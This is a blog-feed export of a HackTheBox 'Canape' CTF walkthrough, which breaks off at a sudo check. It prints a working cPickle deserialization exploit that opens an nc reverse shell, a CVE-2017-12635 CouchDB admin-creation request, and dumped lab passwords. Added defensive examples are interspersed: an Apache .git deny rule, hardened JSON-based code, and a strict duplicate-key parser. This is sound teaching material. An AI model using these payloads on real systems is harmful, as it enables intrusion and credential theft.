tag:blogger.com,1999:blog-13955923459707783832024-03-14T02:16:56.042+06:00The ShahzadaInfoSec Enthusiast | CTF Player | Perpetual Learner ||
~An InfoSec Type of Personal Blog...../TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-1395592345970778383.post-6269986260386167902021-12-15T22:01:00.006+06:002021-12-16T12:39:28.424+06:00HackTheBox: Canape | Python Pickle Deserialization + CouchDB Exploitation<div class="separator" style="clear: both; text-align: center;"><b><span style="font-family: courier; font-size: large;">HackTheBox: Canape</span></b></div><div class="separator" style="clear: both; text-align: center;"><b><span style="font-family: courier; font-size: large;"><br /></span></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjxbFK92bHxZ6j6D0WoAAjXsHbeW1OqVwI7GQLFQ3ABRWdbRKArekwDhX14uD3CJv10MbQmN4qBXKIH84W45Xd-4IRJOsPaIe9ijQaaq2eI-BMSRsvw6b8J0BtQxWa_ELXkxEmp8Z7By6WuWJOKw4jxWMjjcLpuSDzVq97VxUc2lkCHvFsoJzGo2MyA=s1194" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1194" src="https://blogger.googleusercontent.com/img/a/AVvXsEjxbFK92bHxZ6j6D0WoAAjXsHbeW1OqVwI7GQLFQ3ABRWdbRKArekwDhX14uD3CJv10MbQmN4qBXKIH84W45Xd-4IRJOsPaIe9ijQaaq2eI-BMSRsvw6b8J0BtQxWa_ELXkxEmp8Z7By6WuWJOKw4jxWMjjcLpuSDzVq97VxUc2lkCHvFsoJzGo2MyA=s16000" /></a></div><p></p><p><span style="font-family: courier;"><b><span style="font-size: medium;">Summary:</span></b> Canape is a moderate difficulty machine. 
This machine requires a basic understanding of Python to be able to find the exploitable point in the application.</span></p><p><span style="font-family: courier; font-size: medium;"><b>Skills Required:</b></span></p><p></p><ul style="text-align: left;"><li><span style="font-family: courier;">Intermediate knowledge of Linux</span></li><li><span style="font-family: courier;">Basic/Intermediate knowledge of Python</span></li></ul><p></p><div><span style="font-family: courier;"><div><span style="font-size: medium;"><b>Skills Learned:</b></span></div><div><ul style="text-align: left;"><li>Exploiting insecure Python Pickling</li><li>Exploiting Sudo NOPASSWD</li><li>Exploiting Apache CouchDB</li></ul><div><br /></div></div><div><span style="font-size: medium;"><b>Enumeration:</b></span></div><div><b>First things first: we run the Nmap scan.</b></div><div>Nmap finds a webserver on port 80 with an exposed <b>.git</b> directory, SSH running on port 65535, and it looks like we're going to deal with Ubuntu.</div><div><pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 20:24 +06
Nmap scan report for 10.10.10.70
Host is up (0.30s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #nmap -A -p 80,65535 -oA nmap/initial 10.10.10.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 20:31 +06
Nmap scan report for 10.10.10.70
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Simpsons Fan Site
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
|_http-server-header: Apache/2.4.18 (Ubuntu)
65535/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 305.64 ms 10.10.14.1
2 305.04 ms 10.10.10.70
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.56 seconds</code></pre>
<br /><b><span style="font-size: medium;">
Web Fuzzing:
</span></b></div><div>This is a simple Fan site.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjPX9vh089DqYWXClQfCqfIPzYRWTz7K8VMFNZFLeEq9knFTWgAwGtd9MvQ2G_rF75SM8E4okVslcA7CPWjv_UfqihhsEStZMq-OtK5V6La9Nob6-56oUoA81ECnFzaN_MfqhWyl6ijxcTNGWUJ9EbL3xaHhcBUwI11UgNxTPOQJ_EBV5UpLiw8gUuQ=s1996" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1466" data-original-width="1996" src="https://blogger.googleusercontent.com/img/a/AVvXsEjPX9vh089DqYWXClQfCqfIPzYRWTz7K8VMFNZFLeEq9knFTWgAwGtd9MvQ2G_rF75SM8E4okVslcA7CPWjv_UfqihhsEStZMq-OtK5V6La9Nob6-56oUoA81ECnFzaN_MfqhWyl6ijxcTNGWUJ9EbL3xaHhcBUwI11UgNxTPOQJ_EBV5UpLiw8gUuQ=s16000" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIEuaduKuEoG6PpPu5ZBp_ljEmRnfGYQjyAmIWYiBO8xmkgZWcY-gtnc2KPKw70ACUpEn2nPSwLBNCh7eAQCYFIBZKkRIqrLwerOfNMd4mb2QVWCyXk3jHr5x-CIziUC98R6kU2sq_6Sh-w0Th3WLtsioXvkAbj_69oEuJxSX1s5LCIeqLsvFHreof=s2006" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1626" data-original-width="2006" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIEuaduKuEoG6PpPu5ZBp_ljEmRnfGYQjyAmIWYiBO8xmkgZWcY-gtnc2KPKw70ACUpEn2nPSwLBNCh7eAQCYFIBZKkRIqrLwerOfNMd4mb2QVWCyXk3jHr5x-CIziUC98R6kU2sq_6Sh-w0Th3WLtsioXvkAbj_69oEuJxSX1s5LCIeqLsvFHreof=s16000" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTWjkm9-9AkSBL-tDL2OQR1yDJFwSTZR4U1U95FmduiPvCTW--B8XK_PUWNP3zpUPHisamlYQEUhXC6jDVC5o2FVPqaXjYEcwEKh0QBFIPZp23DyuXwwgkjkjVCPZ4GpEt9h19NpcuI2YylfALooZRVbhEaXOKRN--ab6IF1N-s1vxJjTyWyGWcwEh=s2000" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1548" data-original-width="2000" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhTWjkm9-9AkSBL-tDL2OQR1yDJFwSTZR4U1U95FmduiPvCTW--B8XK_PUWNP3zpUPHisamlYQEUhXC6jDVC5o2FVPqaXjYEcwEKh0QBFIPZp23DyuXwwgkjkjVCPZ4GpEt9h19NpcuI2YylfALooZRVbhEaXOKRN--ab6IF1N-s1vxJjTyWyGWcwEh=s16000" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><span style="font-family: courier;"><br /></span></div><br /><div><br /></div><div>The submit form is something we should focus on, but the <b>Nmap scan</b> has already found a <b>.git</b> path that exposes a git repository. Running <b>wfuzz</b> reveals the same exposed repo.</div><div><br /></div><div><b>wfuzz result:</b>
<pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hl 0,82 http://10.10.10.70/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.70/FUZZ
Total requests: 4702
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000012: 200 9 L 43 W 1075 Ch ".git/index"
000000011: 200 11 L 29 W 259 Ch ".git/config"
000000010: 200 1 L 2 W 23 Ch ".git/HEAD"
000000013: 200 17 L 70 W 1130 Ch ".git/logs/"
000000008: 301 9 L 28 W 309 Ch ".git"
000001029: 403 11 L 32 W 294 Ch "cgi-bin/"
000001063: 405 4 L 23 W 178 Ch "check"
000003385: 200 85 L 227 W 3150 Ch "quotes"
000003699: 403 11 L 32 W 299 Ch "server-status"
000003940: 301 9 L 28 W 311 Ch "static"
000003984: 200 81 L 167 W 2836 Ch "submit"
Total time: 156.3866
Processed Requests: 4702
Filtered Requests: 4691
Requests/sec.: 30.06650
</code></pre>
</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhpRqwSYQemsqRPz3YjZ04M5x3WSkQ_mh8jG4QDJLDefrk8-pcUcP2cTMYhcvH2JrEf_Y-Hy1PPw23K7oLRZNv2tk7Vvd4na3JliR4bMCpdF942a4YtQ_Aw_11wJGau70p4cI-O_nlnrqM45VkUthwer_vBAs8nkiyIF9yw063XmALJJp8t-alvHzxw=s1674" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1268" data-original-width="1674" src="https://blogger.googleusercontent.com/img/a/AVvXsEhpRqwSYQemsqRPz3YjZ04M5x3WSkQ_mh8jG4QDJLDefrk8-pcUcP2cTMYhcvH2JrEf_Y-Hy1PPw23K7oLRZNv2tk7Vvd4na3JliR4bMCpdF942a4YtQ_Aw_11wJGau70p4cI-O_nlnrqM45VkUthwer_vBAs8nkiyIF9yw063XmALJJp8t-alvHzxw=s16000" /></a></div><div><span style="font-family: courier;"><br /></span></div><br /><div>When a website exposes its git repo, we can mirror the <b>.git</b> directory with wget and recover the full source and history of the site.</div><div><br /></div><div><b>wget commands:</b>
<pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #wget --mirror -I .git 10.10.10.70/.git
...
...
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #cd 10.10.10.70/
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape/10.10.10.70]
└───╼ #git checkout -- .
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape/10.10.10.70]
└───╼ #ls
__init__.py robots.txt static templates
</code></pre>
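<div>On the defensive side, an added note that is not part of the write-up: what the scan and wfuzz found is a web server serving repository metadata alongside the site. Apache 2.4, which the scan identified on this box, can be told to refuse any path inside a <b>.git</b> directory. The block below is my example configuration, not the box's; it goes in the vhost or the global config. Not deploying the repository into the document root in the first place is the better fix, and this rule is the safety net for when that slips.</div>

```apache
# Refuse to serve anything inside a .git directory, wherever it sits under
# the document root. Apache 2.4 syntax (Require), not the 2.2 Order/Deny form.
<DirectoryMatch "/\.git">
    Require all denied
</DirectoryMatch>
```

<div>After a reload, a request for <b>/.git/HEAD</b> returns 403 instead of the repository head, and the <b>.git/config</b>, <b>.git/index</b> and <b>.git/logs/</b> hits from the wfuzz run above go away with it.</div>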
</div><div><br /></div><div><b><span style="font-size: medium;">Source Code Review:</span></b></div><div>With full access to the source, we see a Python Flask site. Two sections caught my eye: Submit and Check.</div><div><br /></div><div><b>source code:</b><pre><code>import couchdb
import string
import random
import base64
import cPickle
from flask import Flask, render_template, request
from hashlib import md5

app = Flask(__name__)
app.config.update(
    DATABASE = "simpsons"
)
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]

@app.errorhandler(404)
def page_not_found(e):
    if random.randrange(0, 2) > 0:
        return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randrange(50, 250)))
    else:
        return render_template("index.html")

@app.route("/")
def index():
    return render_template("index.html")

@app.route("/quotes")
def quotes():
    quotes = []
    for id in db:
        quotes.append({"title": db[id]["character"], "text": db[id]["quote"]})
    return render_template('quotes.html', entries=quotes)

WHITELIST = [
    "homer",
    "marge",
    "bart",
    "lisa",
    "maggie",
    "moe",
    "carl",
    "krusty"
]

@app.route("/submit", methods=["GET", "POST"])
def submit():
    error = None
    success = None
    if request.method == "POST":
        try:
            char = request.form["character"]
            quote = request.form["quote"]
            if not char or not quote:
                error = True
            elif not any(c.lower() in char.lower() for c in WHITELIST):
                error = True
            else:
                # TODO - Pickle into dictionary instead, `check` is ready
                p_id = md5(char + quote).hexdigest()
                outfile = open("/tmp/" + p_id + ".p", "wb")
                outfile.write(char + quote)
                outfile.close()
                success = True
        except Exception as ex:
            error = True
    return render_template("submit.html", error=error, success=success)

@app.route("/check", methods=["POST"])
def check():
    path = "/tmp/" + request.form["id"] + ".p"
    data = open(path, "rb").read()
    if "p1" in data:
        item = cPickle.loads(data)
    else:
        item = data
    return "Still reviewing: " + item

if __name__ == "__main__":
    app.run()
</code></pre>
</div><div><b>Submit</b></div><div>In this code there is a submit section, where a user posts a character and a quote:</div><div><pre><code>@app.route("/submit", methods=["GET", "POST"])
def submit():
    error = None
    success = None
    if request.method == "POST":
        try:
            char = request.form["character"]
            quote = request.form["quote"]
            if not char or not quote:
                error = True
            elif not any(c.lower() in char.lower() for c in WHITELIST):
                error = True
            else:
                # TODO - Pickle into dictionary instead, `check` is ready
                p_id = md5(char + quote).hexdigest()
                outfile = open("/tmp/" + p_id + ".p", "wb")
                outfile.write(char + quote)
                outfile.close()
                success = True
        except Exception as ex:
            error = True
    return render_template("submit.html", error=error, success=success)
</code></pre>
</div><div><br /></div><div><b>What's going on here?</b></div><div><div><ul style="text-align: left;"><li>The user-submitted 'char' only has to contain one of the character names from the whitelist; it doesn't have to be exactly one of the names.</li><li>The user has no control over the name of the file, but can work out what it will be.</li><li>Nothing is written to the file other than the two user-provided strings concatenated.</li><li>There's a comment referring to /check and pickle.</li></ul><div><b>Check</b></div><div>Looking further down the source, there's a route for /check:</div><div>
<pre><code>@app.route("/check", methods=["POST"])
def check():
    path = "/tmp/" + request.form["id"] + ".p"
    data = open(path, "rb").read()
    if "p1" in data:
        item = cPickle.loads(data)
    else:
        item = data
    return "Still reviewing: " + item</code></pre>
</div></div></div><div><div><b>What's going on here?</b></div><div><ul style="text-align: left;"><li><b>cPickle.loads</b> will run the object's <b>__reduce__</b> method when it is unpickled. So an attacker can create a class with a <b>__reduce__</b> function that executes their desired commands, pickle an instance of that class, and pass that string to canape.</li></ul><div><b><span style="font-size: medium;">www-data Shell:</span></b></div></div></div><div><b><span style="font-size: medium;"><br /></span></b></div><div><span style="font-size: medium;"><b>Exploit:</b></span></div><div><span style="font-size: medium;"><pre><code>import os, cPickle, requests
from hashlib import md5

url = "http://10.10.10.70/"

class Exploit(object):
    def __reduce__(self):
        return (os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f',))

quote = cPickle.dumps(Exploit())
char = "(S'homer'\n"
p_id = md5(char + quote).hexdigest()

# Uploading data
upload_data = [('character',char), ('quote',quote)]
requests.post(url +"submit", data=upload_data)

# Triggering Pickle
id_data = [('id',p_id)]
(requests.post(url + "check", data=id_data))
</code></pre>
<pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #python2 exploit.py
</code></pre>
<pre><code>
┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.70] 40786
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("bash")'
www-data@canape:/$ </code></pre>
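<div>As an added example (my code, not the application's and not from the write-up), here is how the submit and check logic reviewed above looks once the findings are fixed: an exact-match whitelist instead of a substring test, JSON instead of cPickle so that nothing with a <b>__reduce__</b> hook is ever reconstructed, and an id validated against the 32-hex-character form the app itself generates before it is used to build a path. Flask is left out so the two functions run stand-alone, and the storage directory is a fresh temporary one rather than /tmp; both are assumptions of the example.</div>

```python
"""Hardened stand-ins for the Canape submit/check routes (added example).

Not the application's code: the two routes are re-done as plain functions so
they can be exercised without Flask. Assumptions: JSON instead of cPickle as
the on-disk format, and a fresh temporary directory instead of /tmp.
"""
import json
import os
import re
import tempfile
from hashlib import md5

WHITELIST = ["homer", "marge", "bart", "lisa", "maggie", "moe", "carl", "krusty"]

# The only id shape the app itself ever produces: 32 lowercase hex digits.
# Anything else ("..", separators, an empty string) never reaches the path join.
ID_RE = re.compile(r"^[0-9a-f]{32}$")

STORE_DIR = tempfile.mkdtemp(prefix="canape-safe-")  # assumption: not /tmp


def submit(char, quote):
    """Store a quote. Returns the record id, or None if the input is rejected."""
    if not char or not quote:
        return None
    # Exact, case-insensitive match. The original accepted any string that
    # merely *contained* a whitelisted name, e.g. "homerjay".
    if char.lower() not in WHITELIST:
        return None
    p_id = md5((char + quote).encode("utf-8")).hexdigest()
    record = {"character": char, "quote": quote}
    with open(os.path.join(STORE_DIR, p_id + ".json"), "w") as fh:
        json.dump(record, fh)  # plain data; no serialized object, no code path
    return p_id


def check(p_id):
    """Load a stored quote for review. Returns the record dict, or None."""
    if not ID_RE.match(p_id or ""):
        return None
    path = os.path.join(STORE_DIR, p_id + ".json")
    if not os.path.isfile(path):
        return None
    with open(path) as fh:
        # json.load only builds dicts, lists, strings and numbers: there is no
        # __reduce__ hook to run, so a quote that *looks* like pickle data
        # (the original keyed on the substring "p1") is just text.
        return json.load(fh)


if __name__ == "__main__":
    pid = submit("homer", "Doh!")
    print(pid, check(pid))
    print(check(submit("marge", "p1 is just text")))
    print(submit("homerjay", "rejected"), check("../../etc/passwd"))
```

<div>The id stays a deterministic md5 of the submitted strings, as in the original, so the reviewer workflow is unchanged; what changes is that the stored bytes are data the loader cannot turn into a call, and the id is checked against its expected shape before it touches the filesystem.</div>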
</span></div><div><span style="font-size: medium;"><b>Privilege Escalation: www-data → homer:</b></span></div><div><span><b>CouchDB + Enumeration:</b></span></div><div><span>The page source also showed that the Simpsons quotes are stored in CouchDB:</span></div><div><span><pre><code>app.config.update(
    DATABASE = "simpsons"
)
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre>
The couchdb is only on localhost:</span></div><div><span><pre><code>www-data@canape:/$ netstat -ano | grep "LISTEN "
netstat -ano | grep "LISTEN "
tcp 0 0 0.0.0.0:36408 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:65535 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:5984 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:5986 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:4369 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 :::65535 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::4369 :::* LISTEN off (0.00/0/0)
</code></pre>
<br />
</span></div><div><span>To interact with CouchDB, use curl from the shell on the box. The <b>passwords</b> and <b>_users</b> databases seem interesting, but neither is accessible. We can list the ids in a database at the <b>/[database name]/_all_docs</b> path, and fetch an individual document at <b>/[database name]/[id]</b>:<pre><code>www-data@canape:/$ curl http://127.0.0.1:5984/simpsons/_all_docs
curl http://127.0.0.1:5984/simpsons/_all_docs
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
www-data@canape:/$ curl http://127.0.0.1:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
www-data@canape:/$ curl http://127.0.0.1:5984/passwords
curl http://127.0.0.1:5984/passwords
{"error":"unauthorized","reason":"You are not authorized to access this db."}
www-data@canape:/$ curl http://127.0.0.1:5984/_users
curl http://127.0.0.1:5984/_users
{"db_name":"_users","update_seq":"11-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQGPoiQFIJlkD1aHz7AkB5C6eLA6JnzqEkDq6gnam8cCJBkagBRQ6Xxi1C6AqN1PjNoDELX3iVH7AKIW6F7GLADeKW85","sizes":{"file":79122,"external":2678,"active":5042},"purge_seq":0,"other":{"data_size":2678},"doc_del_count":1,"doc_count":3,"disk_size":79122,"disk_format_version":6,"data_size":5042,"compact_running":false,"instance_start_time":"0"}
www-data@canape:/$ curl http://127.0.0.1:5984/_users/_all_docs
curl http://127.0.0.1:5984/_users/_all_docs
{"error":"unauthorized","reason":"You are not a server admin."}<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
Database Privilege Escalation:</b></span></div><div><span><div>CVE-2017-12635 lets an unauthenticated user obtain admin access to CouchDB by taking advantage of how its JavaScript and Erlang JSON parsers handle duplicate keys in an object.</div><div>So, with CVE-2017-12635, to add an admin user we just need an HTTP PUT:</div><pre><code>www-data@canape:/$ curl -X PUT -d '{"type":"user","name":"theshahzada","roles":["_admin"],"roles":[],"password":"thes"}' 127.0.0.1:5984/_users/org.couchdb.user:theshahzada -H "Content-Type:application/json"<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre>
Because the "roles" key appears twice, CouchDB's JavaScript validation only sees the second one (empty), but the Erlang JSON parser keeps both, and we end up with an admin user.
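<div>To make the parser behaviour concrete, here is an added example in Python (my code, not CouchDB's): the same user document run through a last-duplicate-wins parser, a first-duplicate-wins parser, and a strict parser that refuses repeated keys, with a role check on top that shows why the side that validates and the side that stores must see the same object. The document is constructed to match the shape of the PUT above, with a placeholder name and password.</div>

```python
"""Duplicate JSON keys and the CVE-2017-12635 parser differential (added example).

Not CouchDB's code. Three parsers for one document: last duplicate wins
(Python's json and JavaScript's JSON.parse), first duplicate wins (emulated
with object_pairs_hook), and strict (refuses repeated keys). A role check on
top shows why the side that validates and the side that stores must see the
same object. USER_DOC is constructed with a placeholder name and password.
"""
import json

USER_DOC = (
    '{"type":"user","name":"example","roles":["_admin"],"roles":[],'
    '"password":"example-password"}'
)


class DuplicateKeyError(ValueError):
    """Raised by parse_strict when an object repeats a key."""


def parse_last_wins(text):
    """Default json.loads behaviour: a repeated key takes its last value."""
    return json.loads(text)


def parse_first_wins(text):
    """Emulates a parser that keeps the first value of a repeated key."""
    def hook(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(text, object_pairs_hook=hook)


def parse_strict(text):
    """Rejects a repeated key anywhere in the document, at any nesting level."""
    def hook(pairs):
        out = {}
        for key, value in pairs:
            if key in out:
                raise DuplicateKeyError("duplicate key: %r" % key)
            out[key] = value
        return out
    return json.loads(text, object_pairs_hook=hook)


def validate_user_doc(text, parser=parse_strict):
    """Return the roles a self-registered user would be stored with, or raise.

    Mirrors the intent of the _users validation: a signup may not carry a
    privileged (underscore-prefixed) role. With parse_last_wins the check
    passes on USER_DOC because it never sees ["_admin"]; with parse_strict
    the document is refused before any role is examined.
    """
    doc = parser(text)
    roles = doc.get("roles", [])
    if any(role.startswith("_") for role in roles):
        raise PermissionError("privileged role in user document")
    return roles


if __name__ == "__main__":
    print("last wins :", parse_last_wins(USER_DOC)["roles"])
    print("first wins:", parse_first_wins(USER_DOC)["roles"])
    try:
        parse_strict(USER_DOC)
    except DuplicateKeyError as err:
        print("strict    :", err)
```

<div>The point of <b>parse_strict</b> is that it removes the ambiguity rather than picking a side: a document that two parsers could read differently is rejected at the boundary, so it never reaches a validator and a storage layer that might disagree about it.</div>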
</span></div><div><br /></div><div><span><b>Enumeration as admin:</b></span></div><div><span>Now, we can use the creds for the added admin user to read the rest of the db:</span></div><div><br />
<pre><code>
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords
curl http://theshahzada:thes@127.0.0.1:5984/passwords
{"db_name":"passwords","update_seq":"46-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkR2PoiQFIJlkD1bHik-dA0hdPGF1CSB19QTV5bEASYYGIAVUOp8YtQsgavcTo_YARO39rER8AQRR-wCiFuhetiwA7ytvXA","sizes":{"file":222462,"external":665,"active":1740},"purge_seq":0,"other":{"data_size":665},"doc_del_count":0,"doc_count":4,"disk_size":222462,"disk_format_version":6,"data_size":1740,"compact_running":false,"instance_start_time":"0"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/_all_docs
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
SSH as homer:</b></div><div>The first password from the CouchDB enumeration, with "item": "ssh", is promising. We noticed in the initial enumeration that SSH was running on port 65535. We try to SSH as the only user on the box, homer, with the password "0B4jyA0xtytZi7esBNGp", and it works:</div><pre><code>┌──[root@theshahzada]─[/home/theshahzada/Desktop/hackthebox/machines/canape]
└───╼ #ssh -p 65535 homer@10.10.10.70
homer@10.10.10.70's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Tue Dec 14 09:31:52 2021 from 10.10.14.7
homer@canape:~$ cat user.txt
bce918*********288d
</code></pre>
<b style="font-size: large;">Privilege Escalation: </b></span><span style="font-family: courier; font-size: medium;"><b>homer → root</b></span></div><div><span style="font-family: courier; font-size: medium;">homer can run pip with <b>sudo</b>:</span></div><div><span style="font-family: courier; font-size: medium;"><pre><code>homer@canape:~$ sudo -l
